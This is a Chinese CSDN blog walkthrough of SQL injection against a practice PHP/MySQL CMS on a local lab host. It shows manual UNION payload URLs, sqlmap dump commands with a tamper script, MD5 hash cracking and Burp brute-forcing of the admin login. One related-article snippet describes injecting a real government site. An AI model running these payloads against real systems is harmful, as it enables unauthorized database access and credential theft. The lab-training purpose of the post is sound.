渗透测试之SQL注入实战练习---Mysql+php注入练习环境

最新推荐文章于 2024-04-11 12:55:43 发布
最新推荐文章于 2024-04-11 12:55:43 发布
阅读量849 收藏 2
点赞数 2
分类专栏: Hacker Way 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45650712/article/details/107850612
版权

渗透测试之SQL注入实战练习—Mysql+php注入练习环境

渗透测试之SQL注入实战练习
靶机经典案例:Mysql+php注入练习环境(ACTcms,news.php?cid=2&listid=5&newsid=25,可练习outfile,admin/admin,后台上传php4)
方法一:(手工注入)
总共发现4个注入点
第一个listid
第二个 newsid
第三个 cid
第四个 proid
下面笔者将以第一个注入点listid为例展开阐述,详细注入过程如下:
① id后加’,页面返回异常,证明存在注入点。
在这里插入图片描述
② and 1=1 显示正常。
在这里插入图片描述
③ and 1=2 显示不正常 存在数字型注入。
在这里插入图片描述
④ 接下来我们开始查共有几个字段,通过order by进行尝试,发现 11 返回异常,10则返回正常。
在这里插入图片描述
在这里插入图片描述
⑤ 确定出字段后,利用union select确定出回显位置。
在这里插入图片描述
⑥ 确定出回显位置后,利用回显位置查出数据库名称为510cms
在这里插入图片描述
⑦ 再利用回显位置,查询出表名为510_admin。
http://127.0.0.1:800/510cms2/product.php?cid=4&listid=7%20union%20select%201,2,3,table_name,5,6,7,8,9,10%20from%20information_schema.tables%20where%20table_schema=database%28%29(%20为空格,%28%29为())
在这里插入图片描述
⑧ 在根据查出的表名查出表里的字段名分别为id,mid,name,passwd,remark。
http://127.0.0.1:800/510cms2/product.php?cid=4&listid=7%20union%20select%201,2,3,group_concat%28column_name%29,5,6,7,8,9,10%20from%20information_schema.columns%20where%20table_name=’510_admin’%20and%20table_schema=database%28%29
在这里插入图片描述
⑨ 知道表中的字段后,我们就可以获取相应用户名(admin)和密码(21232f297a57a5a743894a0e4a801fc3)了。
http://127.0.0.1:800/510cms2/product.php?cid=4&listid=7%20union%20select%201,2,passwd,name,5,6,7,8,9,10%20from%20510_admin
在这里插入图片描述
⑩ 将(21232f297a57a5a743894a0e4a801fc3)进行MD5解密,可知密码为:admin.
在这里插入图片描述
⑪ 用御剑跑后台拿到管理员登陆页面。
127.0.0.1:800/510cms2/admin/admin_index.php
在这里插入图片描述
⑫ 利用上面的账号密码即可登陆成功,成功拿下最高权限,进行相关操作,注入完成!!!
在这里插入图片描述
在这里插入图片描述

方法二:(sqlmap注入)

注入思想同方法一,起始步骤也同方法一,在得知了注入点后,我们利用sqlmap工具进行注入,这里还是以listid为例展开阐述。
①Listid存在注入点
在这里插入图片描述
在这里插入图片描述
②后端服务器筛选了字符’>’。强烈建议您使用“–tamper=between”重新运行
在这里插入图片描述
③sqlmap.py -u “http://192.168.0.104:800/510cms2/product.php?cid=4&listid=6” --tamper=“between.py” --current-db
这样我们就得出数据库名510cms.
在这里插入图片描述
④得知当前用户权限是否够高,为root@localhost.
在这里插入图片描述
⑤sqlmap.py -u “http://192.168.0.104:800/510cms2/product.php?cid=4&listid=6” --tamper=“between.py” -D 510cms --table --batch
查一下数据库510cms中有哪些表,具体如下图所示:

在这里插入图片描述
⑥sqlmap.py -u “http://192.168.0.104:800/510cms2/product.php?cid=4&listid=6” --tamper=“between.py” -D 510cms -T 510_admin --columns --batch
查一下510_admin表中有几列,具体如下如所示:
在这里插入图片描述
⑦sqlmap.py -u “http://192.168.0.104:800/510cms2/product.php?cid=4&listid=6” --tamper=“between.py” -D 510cms -T 510_admin --tables -C “name,passwd” --dump --batch
这样我们就得到了用户名密码:
在这里插入图片描述
⑧之后同方法一,利用MD5进行解密,得到密码,在用御剑拿到后台登陆页面,即可登录后台,进行操作!!!注入成功!!!

方法三:(暴力破解方式拿到权限)

① 首先用御剑跑出后台登陆地址。
在这里插入图片描述
②打开URL:http://192.168.3.83:800/510cms2/admin/
获取admin目录下全部路径
在这里插入图片描述
② 打开管理员登录页面:http://192.168.3.83:800/510cms2/admin/login.php
在这里插入图片描述
③ 使用同一个验证码,用burp进行多次尝试发现提示用户名或密码不正确而非验证码不正确,此处验证码获取可以多次使用,没有时效性(此处验证码区分大小写)
在这里插入图片描述
在这里插入图片描述
④ 尝试暴力破解
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
⑤ 看到admin/admin与其他明显长度不同
尝试管理员账号密码是否为admin/admin
登录成功,成功爆破!!!
在这里插入图片描述
(完毕!!!)
后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗
在这里插入图片描述

永不垂头
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SQL注入实战演练
derman的博客
10-16 250
1.如何判断此处是否有SQL注入漏洞? 方法一:输入-1或+1,看是否能够回显上一个或者下一个页面(判断是否有回显)。 方法二:'或" ,看是否显示数据库错误信息,并根据回显内容可以判断是字符型数据还是数字型。 方法三:and 1=1 或and 1=2 ,看回显的页面是否不同(布尔类型的状态)。 方法四:and sleep(5) ,判断页面的返回时间。 方法五:\ ,判断转义 2.实例 2.1 联合查询 2.1 报错注入 2.3 布尔盲注 2.4 延时注入 2.5 堆...
[SQL注入练习]K8-ASP渗透环境[K8team].rar
05-08
[SQL注入练习]K8-ASP渗透环境[K8team].rar
MySQL注入基础练习
a3635398的博客
01-06 189
以sqli-labs-master作为练习 初始:简单获取基础内容 第一步,使用拼接的方式决定注入类型 第二部,使用order by确定有表单有几列值 order by根据指定的列对结果集进行排序 第三步,使用union select 来找到内容,获取想要得到内容 union select :联合查询 进阶,通过mysql注入获取表单内容,托库; 第一步:通...
给大家发一个SQL注入实战教程吧
Y7967
12-24 3935
(大家可以用GOOGLE搜索,www.jinshouzhi.org有得下)这篇文章是去年10月份发的,我今年3月份才发现,这么长时间以来我的网站www.shbbs.net一直被当作教程攻击,呵呵,晕死。直到有一个好心网友提醒我我才做了一些处理。大家不要再按教程上直接使用攻击我的网站www.shbbs.net了,呵呵我已经打了预防针了:)找别人的去演习吧:)以下是文章部分,还有动画教程,
搭建sqli-labs环境练习SQL注入
ONS_cukuyo的博客
09-27 1803
sqli-labs是什么 以下信息粗浅翻译自:sqli-labs SQLI-LABS是一个学习SQL注入的平台: 基于错误的注入 (Union Select) String 字符型 Intiger 数字型 基于错误的注入 (基于双注入) 盲注: 1.基于布尔型的 2.基于时间的 更新查询注入. 插入查询注入. 头注入. 1.基于R...
35-35.渗透测试SQL注入SQL注入防御
最新发布
05-10
35-35.渗透测试SQL注入SQL注入防御
29-29.渗透测试SQL注入基础(上)
05-10
渗透测试SQL注入基础(上)
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sql注入练习工具
11-08
sql注入小工具 测试sql注入 安全类 仅供 学习参考使用
本地网站 练习sql注入使用 新手必备
11-13
本地网站 用于练习sql注入使用 新手必备 本地网站 用于练习sql注入使用 新手必备
简单的mysql注入练习
qq_43208282的博客
09-23 649
练习记录 靶场地址是网络上找的http://120.203.13.75:6815/?id=1 第一步:检查是否有注入点 ?id =1 and 1=1 判断为真 ?id =1 and 1=2 判断为假 (and理解为数学中且的含义) 第二步:查找字段 http://120.203.13.75:6815/?id=1 order by 1,2 (从1往上加,在2时页面没有出错,判断有两个字段) 第三...
一篇文章教你玩转,入门级 SQL 注入实战
朱雀随云记的博客
04-11 677
uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。
sql注入第一次实战
strwolf的专栏
03-31 1441
0x00. 光看书想睡觉,所以打算还是找个实际的环境来练练手。 0x01. 寻找目标:去wooyun看了666个政府网站的注入点,所以很受启发,随便用一个点google一下,再在结果中随便找了一个 0x02. 确认是否存在SQL注入漏洞:参数本身是id=7,乍一看是数值参数,直接?id=7 and 1=2页面正常返回,猜测参数被单引号包围,尝试用单引号去闭合?id=7' and 1=2--%2
php注入实例
05-03 306
php注入实例 在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysqlphp硬啃了几个星期,下面说说我的休会吧,希望能抛砖引玉! 相信大家对asp的注入已经是十分熟悉了,而对php注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而 php大多和mysql结合,而mysql的功能上的缺点,从另外一人角度看确在一定...
mysql注入靶场_某靶场的sql注入练习(MySQL)
weixin_42518709的博客
02-01 456
这个之前就做了,但是当时没有做记录,所以这次重新进行一次,顺便把过程记录下来,分享给大家。-----没什么技术含量,仅仅是一次练习的记录-----启动靶场好的,现在靶场启动成功,点击“[点击访问]”进入靶场。这里是主界面:从这里可以看到,需要通过sql注入来拿到用户登陆账号密码。然后这个页面除了登陆相关的内容可以点击,就只有“登录”按钮下面的公告可以点开,这里点开公告。这里看到了一条公告,而且我们...
SQL注入实战(一)
木尤的博客
07-10 1060
封神台靶场 https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7 查找注入点: sqlmap.py -u http://59.63.200.79:8003/?id=1 查找数据库 sqlmap.py -u http://59.63.200.79:8003/?id=1 --dbs 有三个数据库 available databases [3]: [] information_schema [] maoshe [*] test 初步判断是maoshe 查找m
MySQL一些简单的注入题目...
m0_62107398的博客
02-19 3189
CTFHub——SQL注入 一.整数型注入 听xx的话,咱就输个1试试 通过提示可以知道有两行内容,然后就可以通过union 获取一些其他数据。 通过database获取该表存在的数据库sqli 继续使用information函数完成对表,字段的检索,获得flag。 二.字符型注入 单引号大胆猜测字符型,假装看不见字...反正就是注意闭合引号 不闭合就会这个样子 持续操作爆 库名,表名,字段名。 下次有用还叭叭。 ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值